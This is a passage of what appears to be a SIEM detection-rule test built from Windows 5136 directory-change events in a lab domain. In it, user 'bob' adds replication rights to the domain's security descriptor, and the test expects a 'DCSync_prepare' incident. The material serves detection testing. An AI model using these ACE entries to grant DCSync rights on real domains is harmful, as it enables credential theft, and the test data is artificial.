6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541
;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)\"},{\"Name\":\"OperationType\",\"text\":\"%%14675\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "{2ea9670c-f0f9-4d3f-90e5-a087e8c05863}", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5136_A_directory_service_object_was_modified", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5136", "normalized": true, "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value deleted", "object.type": "domainDNS", "object.value": 
"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b5
8b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T15:53:16.899Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-25T21:28:45.022Z", "type": "raw", "uuid": "8a459521-d4bd-4b57-b83c-a3e48071b3cd"} +{"action": "modify", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5136\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14081\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-25T21:28:45.0226312Z\"},\"EventRecordID\":\"198242589\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"2868\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"OpCorrelationID\",\"text\":\"{2ea9670c-f0f9-4d3f-90e5-a087e8c05863}\"},{\"Name\":\"AppCorrelationID\",\"text\":\"-\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1108\"},{\"Name\":\"SubjectUserName\",\"text\":\"bob\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40f2719\"},{\"Name\":\"DSName\",\"text\":\"insecurebank.local\"},{\"Name\":\"DSType\",\"text\":\"%%14676\"},{\"Name\":\"ObjectDN\",\"text\":\"DC=insecurebank,DC=local\"},{\"Name\":\"ObjectGUID\",\"text\":\"{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"ObjectClass\",\"text\":\"domainDNS\"},{\"Name\":\"AttributeLDAPDisplayName\",\"text\":\"nTSecurityDescriptor\"},{\"Name\":\"AttributeSyntaxOID\",\"text\":\"2.5.5.15\"},{\"Name\":\"AttributeValue\",\"text\":\"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f
28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;
AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)\"},{\"Name\":\"OperationType\",\"text\":\"%%14674\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "{2ea9670c-f0f9-4d3f-90e5-a087e8c05863}", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5136_A_directory_service_object_was_modified", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5136", "normalized": true, "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value added", "object.type": "domainDNS", "object.value": 
"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c
04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T15:53:16.903Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-25T21:28:45.022Z", "type": "raw", "uuid": "51381f34-7783-4419-8100-ce0b38165f5d"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Account Manipulation", "correlation_name": "DCSync_prepare_Add_replicatation_rights_to_Account", "correlation_type": "incident", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "DCSync_prepare_Add_replicatation_rights_to_Account|dc1.insecurebank.local|s-1-5-21-738609754-2819869699-4189121830-1108", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value added", "object.type": "domainDNS", "object.value": 
"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c
04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11